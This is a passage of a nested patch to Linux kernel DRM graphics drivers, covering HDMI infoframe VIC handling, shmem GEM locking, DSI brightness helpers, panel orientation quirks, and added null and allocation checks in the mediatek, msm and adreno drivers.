+-		 * We parse the HDMI VSDB after having added the cea modes as we
+-		 * will be patching their flags when the sink supports stereo
+-		 * 3D.
+-		 */
+-		if (hdmi)
+-			modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
+-						    video, video_len);
+ 	}
+ 	cea_db_iter_end(&iter);
+ 
++	/*
++	 * We parse the HDMI VSDB after having added the cea modes as we will be
++	 * patching their flags when the sink supports stereo 3D.
++	 */
++	if (hdmi)
++		modes += do_hdmi_vsdb_modes(connector, hdmi, hdmi_len,
++					    video, video_len);
++
+ 	return modes;
+ }
+ 
+@@ -6705,8 +6703,6 @@ static u8 drm_mode_hdmi_vic(const struct drm_connector *connector,
+ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 			   const struct drm_display_mode *mode)
+ {
+-	u8 vic;
+-
+ 	/*
+ 	 * HDMI spec says if a mode is found in HDMI 1.4b 4K modes
+ 	 * we should send its VIC in vendor infoframes, else send the
+@@ -6716,13 +6712,18 @@ static u8 drm_mode_cea_vic(const struct drm_connector *connector,
+ 	if (drm_mode_hdmi_vic(connector, mode))
+ 		return 0;
+ 
+-	vic = drm_match_cea_mode(mode);
++	return drm_match_cea_mode(mode);
++}
+ 
+-	/*
+-	 * HDMI 1.4 VIC range: 1 <= VIC <= 64 (CEA-861-D) but
+-	 * HDMI 2.0 VIC range: 1 <= VIC <= 107 (CEA-861-F). So we
+-	 * have to make sure we dont break HDMI 1.4 sinks.
+-	 */
++/*
++ * Avoid sending VICs defined in HDMI 2.0 in AVI infoframes to sinks that
++ * conform to HDMI 1.4.
++ *
++ * HDMI 1.4 (CTA-861-D) VIC range: [1..64]
++ * HDMI 2.0 (CTA-861-F) VIC range: [1..107]
++ */
++static u8 vic_for_avi_infoframe(const struct drm_connector *connector, u8 vic)
++{
+ 	if (!is_hdmi2_sink(connector) && vic > 64)
+ 		return 0;
+ 
+@@ -6798,7 +6799,7 @@ drm_hdmi_avi_infoframe_from_display_mode(struct hdmi_avi_infoframe *frame,
+ 		picture_aspect = HDMI_PICTURE_ASPECT_NONE;
+ 	}
+ 
+-	frame->video_code = vic;
++	frame->video_code = vic_for_avi_infoframe(connector, vic);
+ 	frame->picture_aspect = picture_aspect;
+ 	frame->active_aspect = HDMI_ACTIVE_ASPECT_PICTURE;
+ 	frame->scan_mode = HDMI_SCAN_MODE_UNDERSCAN;
+diff --git a/drivers/gpu/drm/drm_fourcc.c b/drivers/gpu/drm/drm_fourcc.c
+index 6242dfbe92402..0f17dfa8702b4 100644
+--- a/drivers/gpu/drm/drm_fourcc.c
++++ b/drivers/gpu/drm/drm_fourcc.c
+@@ -190,6 +190,10 @@ const struct drm_format_info *__drm_format_info(u32 format)
+ 		{ .format = DRM_FORMAT_BGRA5551,	.depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1, .has_alpha = true },
+ 		{ .format = DRM_FORMAT_RGB565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR565,		.depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#ifdef __BIG_ENDIAN
++		{ .format = DRM_FORMAT_XRGB1555 | DRM_FORMAT_BIG_ENDIAN, .depth = 15, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++		{ .format = DRM_FORMAT_RGB565 | DRM_FORMAT_BIG_ENDIAN, .depth = 16, .num_planes = 1, .cpp = { 2, 0, 0 }, .hsub = 1, .vsub = 1 },
++#endif
+ 		{ .format = DRM_FORMAT_RGB888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_BGR888,		.depth = 24, .num_planes = 1, .cpp = { 3, 0, 0 }, .hsub = 1, .vsub = 1 },
+ 		{ .format = DRM_FORMAT_XRGB8888,	.depth = 24, .num_planes = 1, .cpp = { 4, 0, 0 }, .hsub = 1, .vsub = 1 },
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index b602cd72a1205..7af9da886d4e5 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -681,23 +681,7 @@ struct sg_table *drm_gem_shmem_get_sg_table(struct drm_gem_shmem_object *shmem)
+ }
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_sg_table);
+ 
+-/**
+- * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
+- *				 scatter/gather table for a shmem GEM object.
+- * @shmem: shmem GEM object
+- *
+- * This function returns a scatter/gather table suitable for driver usage. If
+- * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
+- * table created.
+- *
+- * This is the main function for drivers to get at backing storage, and it hides
+- * and difference between dma-buf imported and natively allocated objects.
+- * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
+- *
+- * Returns:
+- * A pointer to the scatter/gather table of pinned pages or errno on failure.
+- */
+-struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++static struct sg_table *drm_gem_shmem_get_pages_sgt_locked(struct drm_gem_shmem_object *shmem)
+ {
+ 	struct drm_gem_object *obj = &shmem->base;
+ 	int ret;
+@@ -708,7 +692,7 @@ struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
+ 
+ 	WARN_ON(obj->import_attach);
+ 
+-	ret = drm_gem_shmem_get_pages(shmem);
++	ret = drm_gem_shmem_get_pages_locked(shmem);
+ 	if (ret)
+ 		return ERR_PTR(ret);
+ 
+@@ -730,9 +714,39 @@ err_free_sgt:
+ 	sg_free_table(sgt);
+ 	kfree(sgt);
+ err_put_pages:
+-	drm_gem_shmem_put_pages(shmem);
++	drm_gem_shmem_put_pages_locked(shmem);
+ 	return ERR_PTR(ret);
+ }
++
++/**
++ * drm_gem_shmem_get_pages_sgt - Pin pages, dma map them, and return a
++ *				 scatter/gather table for a shmem GEM object.
++ * @shmem: shmem GEM object
++ *
++ * This function returns a scatter/gather table suitable for driver usage. If
++ * the sg table doesn't exist, the pages are pinned, dma-mapped, and a sg
++ * table created.
++ *
++ * This is the main function for drivers to get at backing storage, and it hides
++ * and difference between dma-buf imported and natively allocated objects.
++ * drm_gem_shmem_get_sg_table() should not be directly called by drivers.
++ *
++ * Returns:
++ * A pointer to the scatter/gather table of pinned pages or errno on failure.
++ */
++struct sg_table *drm_gem_shmem_get_pages_sgt(struct drm_gem_shmem_object *shmem)
++{
++	int ret;
++	struct sg_table *sgt;
++
++	ret = mutex_lock_interruptible(&shmem->pages_lock);
++	if (ret)
++		return ERR_PTR(ret);
++	sgt = drm_gem_shmem_get_pages_sgt_locked(shmem);
++	mutex_unlock(&shmem->pages_lock);
++
++	return sgt;
++}
+ EXPORT_SYMBOL_GPL(drm_gem_shmem_get_pages_sgt);
+ 
+ /**
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index 3ec02748d56fe..f25ddfe37498f 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -1224,6 +1224,58 @@ int mipi_dsi_dcs_get_display_brightness(struct mipi_dsi_device *dsi,
+ }
+ EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness);
+ 
++/**
++ * mipi_dsi_dcs_set_display_brightness_large() - sets the 16-bit brightness value
++ *    of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_set_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 brightness)
++{
++	u8 payload[2] = { brightness >> 8, brightness & 0xff };
++	ssize_t err;
++
++	err = mipi_dsi_dcs_write(dsi, MIPI_DCS_SET_DISPLAY_BRIGHTNESS,
++				 payload, sizeof(payload));
++	if (err < 0)
++		return err;
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_set_display_brightness_large);
++
++/**
++ * mipi_dsi_dcs_get_display_brightness_large() - gets the current 16-bit
++ *    brightness value of the display
++ * @dsi: DSI peripheral device
++ * @brightness: brightness value
++ *
++ * Return: 0 on success or a negative error code on failure.
++ */
++int mipi_dsi_dcs_get_display_brightness_large(struct mipi_dsi_device *dsi,
++					     u16 *brightness)
++{
++	u8 brightness_be[2];
++	ssize_t err;
++
++	err = mipi_dsi_dcs_read(dsi, MIPI_DCS_GET_DISPLAY_BRIGHTNESS,
++				brightness_be, sizeof(brightness_be));
++	if (err <= 0) {
++		if (err == 0)
++			err = -ENODATA;
++
++		return err;
++	}
++
++	*brightness = (brightness_be[0] << 8) | brightness_be[1];
++
++	return 0;
++}
++EXPORT_SYMBOL(mipi_dsi_dcs_get_display_brightness_large);
++
+ static int mipi_dsi_drv_probe(struct device *dev)
+ {
+ 	struct mipi_dsi_driver *drv = to_mipi_dsi_driver(dev->driver);
+diff --git a/drivers/gpu/drm/drm_mode_config.c b/drivers/gpu/drm/drm_mode_config.c
+index 688c8afe0bf17..8525ef8515406 100644
+--- a/drivers/gpu/drm/drm_mode_config.c
++++ b/drivers/gpu/drm/drm_mode_config.c
+@@ -399,6 +399,8 @@ static void drm_mode_config_init_release(struct drm_device *dev, void *ptr)
+  */
+ int drmm_mode_config_init(struct drm_device *dev)
+ {
++	int ret;
++
+ 	mutex_init(&dev->mode_config.mutex);
+ 	drm_modeset_lock_init(&dev->mode_config.connection_mutex);
+ 	mutex_init(&dev->mode_config.idr_mutex);
+@@ -420,7 +422,11 @@ int drmm_mode_config_init(struct drm_device *dev)
+ 	init_llist_head(&dev->mode_config.connector_free_list);
+ 	INIT_WORK(&dev->mode_config.connector_free_work, drm_connector_free_work_fn);
+ 
+-	drm_mode_create_standard_properties(dev);
++	ret = drm_mode_create_standard_properties(dev);
++	if (ret) {
++		drm_mode_config_cleanup(dev);
++		return ret;
++	}
+ 
+ 	/* Just to be sure */
+ 	dev->mode_config.num_fb = 0;
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index 3659f0465a724..5522d610c5cfd 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -30,12 +30,6 @@ struct drm_dmi_panel_orientation_data {
+ 	int orientation;
+ };
+ 
+-static const struct drm_dmi_panel_orientation_data asus_t100ha = {
+-	.width = 800,
+-	.height = 1280,
+-	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+-};
+-
+ static const struct drm_dmi_panel_orientation_data gpd_micropc = {
+ 	.width = 720,
+ 	.height = 1280,
+@@ -97,6 +91,12 @@ static const struct drm_dmi_panel_orientation_data lcd720x1280_rightside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd800x1280_leftside_up = {
++	.width = 800,
++	.height = 1280,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data lcd800x1280_rightside_up = {
+ 	.width = 800,
+ 	.height = 1280,
+@@ -127,6 +127,12 @@ static const struct drm_dmi_panel_orientation_data lcd1600x2560_leftside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd1600x2560_rightside_up = {
++	.width = 1600,
++	.height = 2560,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct dmi_system_id orientation_data[] = {
+ 	{	/* Acer One 10 (S1003) */
+ 		.matches = {
+@@ -151,7 +157,7 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100HAN"),
+ 		},
+-		.driver_data = (void *)&asus_t100ha,
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* Asus T101HA */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+@@ -196,6 +202,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Hi10 pro tablet"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Dynabook K50 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* GPD MicroPC (generic strings, also match on bios date) */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Default string"),
+@@ -310,6 +322,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGL"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* Lenovo IdeaPad Duet 3 10IGL5 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
+ 		.matches = {
+ 		  /* Non exact match to match all versions */
+@@ -331,6 +349,13 @@ static const struct dmi_system_id orientation_data[] = {
+ 		 DMI_MATCH(DMI_BIOS_VERSION, "BLADE_21"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Tab 3 X90F */
++		.matches = {
++		 DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		 DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		 DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)&lcd1600x2560_rightside_up,
+ 	}, {	/* Nanote UMPC-01 */
+ 		.matches = {
+ 		 DMI_MATCH(DMI_SYS_VENDOR, "RWC CO.,LTD"),
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_dsi.c b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+index ec673223d6b7a..b5305b145ddbd 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_dsi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+@@ -805,15 +805,15 @@ static int exynos_dsi_init_link(struct exynos_dsi *dsi)
+ 			reg |= DSIM_AUTO_MODE;
+ 		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_HSE)
+ 			reg |= DSIM_HSE_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP)
+ 			reg |= DSIM_HFP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP)
+ 			reg |= DSIM_HBP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA)
+ 			reg |= DSIM_HSA_MODE;
+ 	}
+ 
+-	if (!(dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET))
++	if (dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET)
+ 		reg |= DSIM_EOT_DISABLE;
+ 
+ 	switch (dsi->format) {
+diff --git a/drivers/gpu/drm/gud/gud_pipe.c b/drivers/gpu/drm/gud/gud_pipe.c
+index 7c6dc2bcd14a6..61f4abaf1811f 100644
+--- a/drivers/gpu/drm/gud/gud_pipe.c
++++ b/drivers/gpu/drm/gud/gud_pipe.c
+@@ -157,8 +157,8 @@ static int gud_prep_flush(struct gud_device *gdrm, struct drm_framebuffer *fb,
+ {
+ 	struct dma_buf_attachment *import_attach = fb->obj[0]->import_attach;
+ 	u8 compression = gdrm->compression;
+-	struct iosys_map map[DRM_FORMAT_MAX_PLANES];
+-	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES];
++	struct iosys_map map[DRM_FORMAT_MAX_PLANES] = { };
++	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES] = { };
+ 	struct iosys_map dst;
+ 	void *vaddr, *buf;
+ 	size_t pitch, len;
+diff --git a/drivers/gpu/drm/i915/display/intel_quirks.c b/drivers/gpu/drm/i915/display/intel_quirks.c
+index 6e48d3bcdfec5..a280448df771a 100644
+--- a/drivers/gpu/drm/i915/display/intel_quirks.c
++++ b/drivers/gpu/drm/i915/display/intel_quirks.c
+@@ -199,6 +199,8 @@ static struct intel_quirk intel_quirks[] = {
+ 	/* ECS Liva Q2 */
+ 	{ 0x3185, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
+ 	{ 0x3184, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
++	/* HP Notebook - 14-r206nv */
++	{ 0x0f31, 0x103c, 0x220f, quirk_invert_brightness },
+ };
+ 
+ void intel_init_quirks(struct drm_i915_private *i915)
+diff --git a/drivers/gpu/drm/i915/gt/intel_ring.c b/drivers/gpu/drm/i915/gt/intel_ring.c
+index 15ec64d881c44..fb99143be98e7 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ring.c
++++ b/drivers/gpu/drm/i915/gt/intel_ring.c
+@@ -53,7 +53,7 @@ int intel_ring_pin(struct intel_ring *ring, struct i915_gem_ww_ctx *ww)
+ 	if (unlikely(ret))
+ 		goto err_unpin;
+ 
+-	if (i915_vma_is_map_and_fenceable(vma)) {
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915)) {
+ 		addr = (void __force *)i915_vma_pin_iomap(vma);
+ 	} else {
+ 		int type = i915_coherent_map_type(vma->vm->i915, vma->obj, false);
+@@ -98,7 +98,7 @@ void intel_ring_unpin(struct intel_ring *ring)
+ 		return;
+ 
+ 	i915_vma_unset_ggtt_write(vma);
+-	if (i915_vma_is_map_and_fenceable(vma))
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915))
+ 		i915_vma_unpin_iomap(vma);
+ 	else
+ 		i915_gem_object_unpin_map(vma->obj);
+@@ -116,7 +116,7 @@ static struct i915_vma *create_ring_vma(struct i915_ggtt *ggtt, int size)
+ 
+ 	obj = i915_gem_object_create_lmem(i915, size, I915_BO_ALLOC_VOLATILE |
+ 					  I915_BO_ALLOC_PM_VOLATILE);
+-	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt))
++	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt) && !HAS_LLC(i915))
+ 		obj = i915_gem_object_create_stolen(i915, size);
+ 	if (IS_ERR(obj))
+ 		obj = i915_gem_object_create_internal(i915, size);
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 112615817dcbe..5071f1263216b 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -945,6 +945,8 @@ int mtk_drm_crtc_create(struct drm_device *drm_dev,
+ 
+ 	mtk_crtc->planes = devm_kcalloc(dev, num_comp_planes,
+ 					sizeof(struct drm_plane), GFP_KERNEL);
++	if (!mtk_crtc->planes)
++		return -ENOMEM;
+ 
+ 	for (i = 0; i < mtk_crtc->ddp_comp_nr; i++) {
+ 		ret = mtk_drm_crtc_init_comp_planes(drm_dev, mtk_crtc, i,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_drv.c b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+index 91f58db5915f5..25639fbfd374a 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_drv.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+@@ -514,6 +514,7 @@ static int mtk_drm_bind(struct device *dev)
+ err_deinit:
+ 	mtk_drm_kms_deinit(drm);
+ err_free:
++	private->drm = NULL;
+ 	drm_dev_put(drm);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index 47e96b0289f98..6c204ccfb9ece 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -164,8 +164,6 @@ static int mtk_drm_gem_object_mmap(struct drm_gem_object *obj,
+ 
+ 	ret = dma_mmap_attrs(priv->dma_dev, vma, mtk_gem->cookie,
+ 			     mtk_gem->dma_addr, obj->size, mtk_gem->dma_attrs);
+-	if (ret)
+-		drm_gem_vm_close(vma);
+ 
+ 	return ret;
+ }
+@@ -262,6 +260,6 @@ void mtk_drm_gem_prime_vunmap(struct drm_gem_object *obj,
+ 		return;
+ 
+ 	vunmap(vaddr);
+-	mtk_gem->kvaddr = 0;
++	mtk_gem->kvaddr = NULL;
+ 	kfree(mtk_gem->pages);
+ }
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 3b7d13028fb6b..9e1363c9fcdb4 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -721,7 +721,7 @@ static void mtk_dsi_lane_ready(struct mtk_dsi *dsi)
+ 		mtk_dsi_clk_ulp_mode_leave(dsi);
+ 		mtk_dsi_lane0_ulp_mode_leave(dsi);
+ 		mtk_dsi_clk_hs_mode(dsi, 0);
+-		msleep(20);
++		usleep_range(1000, 3000);
+ 		/* The reaction time after pulling up the mipi signal for dsi_rx */
+ 	}
+ }
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index 2e7531d2a5d6e..dfd4eec217859 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -1082,13 +1082,13 @@ int adreno_gpu_init(struct drm_device *drm, struct platform_device *pdev,
+ void adreno_gpu_cleanup(struct adreno_gpu *adreno_gpu)
+ {
+ 	struct msm_gpu *gpu = &adreno_gpu->base;
+-	struct msm_drm_private *priv = gpu->dev->dev_private;
++	struct msm_drm_private *priv = gpu->dev ? gpu->dev->dev_private : NULL;
+ 	unsigned int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(adreno_gpu->info->fw); i++)
+ 		release_firmware(adreno_gpu->fw[i]);
+ 
+-	if (pm_runtime_enabled(&priv->gpu_pdev->dev))
++	if (priv && pm_runtime_enabled(&priv->gpu_pdev->dev))
+ 		pm_runtime_disable(&priv->gpu_pdev->dev);
+ 
+ 	msm_gpu_cleanup(&adreno_gpu->base);
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+index 13ce321283ff9..c9d1c412628e9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -968,7 +968,10 @@ static void dpu_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		dpu_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	if (cstate)
++		__drm_atomic_helper_crtc_reset(crtc, &cstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ /**
+@@ -1150,6 +1153,8 @@ static int dpu_crtc_atomic_check(struct drm_crtc *crtc,
+ 	bool needs_dirtyfb = dpu_crtc_needs_dirtyfb(crtc_state);
+ 
+ 	pstates = kzalloc(sizeof(*pstates) * DPU_STAGE_MAX * 4, GFP_KERNEL);
++	if (!pstates)
++		return -ENOMEM;
+ 
+ 	if (!crtc_state->enable || !crtc_state->active) {
+ 		DRM_DEBUG_ATOMIC("crtc%d -> enable %d, active %d, skip atomic_check\n",
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 27f029fdc6829..365738f40976a 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -444,6 +444,8 @@ static const struct dpu_mdp_cfg sc7180_mdp[] = {
+ 		.reg_off = 0x2B4, .bit_off = 8},
+ 	.clk_ctrls[DPU_CLK_CTRL_CURSOR1] = {
+ 		.reg_off = 0x2C4, .bit_off = 8},
++	.clk_ctrls[DPU_CLK_CTRL_WB2] = {
++		.reg_off = 0x3B8, .bit_off = 24},
+ 	},
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+index 5e6e2626151e8..b7901b666612a 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_kms.c
+@@ -942,6 +942,11 @@ static void dpu_kms_mdp_snapshot(struct msm_disp_state *disp_state, struct msm_k
+ 	msm_disp_snapshot_add_block(disp_state, cat->mdp[0].len,
+ 			dpu_kms->mmio + cat->mdp[0].base, "top");
+ 
++	/* dump DSC sub-blocks HW regs info */
++	for (i = 0; i < cat->dsc_count; i++)
++		msm_disp_snapshot_add_block(disp_state, cat->dsc[i].len,
++				dpu_kms->mmio + cat->dsc[i].base, "dsc_%d", i);
++
+ 	pm_runtime_put_sync(&dpu_kms->pdev->dev);
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+index 658005f609f4b..3fbda2a1f77fc 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_plane.c
+@@ -1124,7 +1124,7 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	struct dpu_plane_state *pstate = to_dpu_plane_state(state);
+ 	struct drm_crtc *crtc = state->crtc;
+ 	struct drm_framebuffer *fb = state->fb;
+-	bool is_rt_pipe, update_qos_remap;
++	bool is_rt_pipe;
+ 	const struct dpu_format *fmt =
+ 		to_dpu_format(msm_framebuffer_format(fb));
+ 	struct dpu_hw_pipe_cfg pipe_cfg;
+@@ -1136,6 +1136,9 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 	pstate->pending = true;
+ 
+ 	is_rt_pipe = (dpu_crtc_get_client_type(crtc) != NRT_CLIENT);
++	pstate->needs_qos_remap |= (is_rt_pipe != pdpu->is_rt_pipe);
++	pdpu->is_rt_pipe = is_rt_pipe;
++
+ 	_dpu_plane_set_qos_ctrl(plane, false, DPU_PLANE_QOS_PANIC_CTRL);
+ 
+ 	DPU_DEBUG_PLANE(pdpu, "FB[%u] " DRM_RECT_FP_FMT "->crtc%u " DRM_RECT_FMT
+@@ -1217,14 +1220,8 @@ static void dpu_plane_sspp_atomic_update(struct drm_plane *plane)
+ 		_dpu_plane_set_ot_limit(plane, crtc, &pipe_cfg);
+ 	}
+ 
+-	update_qos_remap = (is_rt_pipe != pdpu->is_rt_pipe) ||
+-			pstate->needs_qos_remap;
+-
+-	if (update_qos_remap) {
+-		if (is_rt_pipe != pdpu->is_rt_pipe)
+-			pdpu->is_rt_pipe = is_rt_pipe;
+-		else if (pstate->needs_qos_remap)
+-			pstate->needs_qos_remap = false;
++	if (pstate->needs_qos_remap) {
++		pstate->needs_qos_remap = false;
+ 		_dpu_plane_set_qos_remap(plane);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+index 73b3442e74679..7ada957adbbb8 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_rm.c
+@@ -660,6 +660,11 @@ int dpu_rm_get_assigned_resources(struct dpu_rm *rm,
+ 				  blks_size, enc_id);
+ 			break;
+ 		}
++		if (!hw_blks[i]) {
++			DPU_ERROR("Allocated resource %d unavailable to assign to enc %d\n",
++				  type, enc_id);
++			break;
++		}
+ 		blks[num_blks++] = hw_blks[i];
+ 	}
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+index 088ec990a2f26..2a5a68366582b 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_writeback.c
+@@ -70,6 +70,8 @@ int dpu_writeback_init(struct drm_device *dev, struct drm_encoder *enc,
+ 	int rc = 0;
+ 
+ 	dpu_wb_conn = devm_kzalloc(dev->dev, sizeof(*dpu_wb_conn), GFP_KERNEL);
++	if (!dpu_wb_conn)
++		return -ENOMEM;
+ 
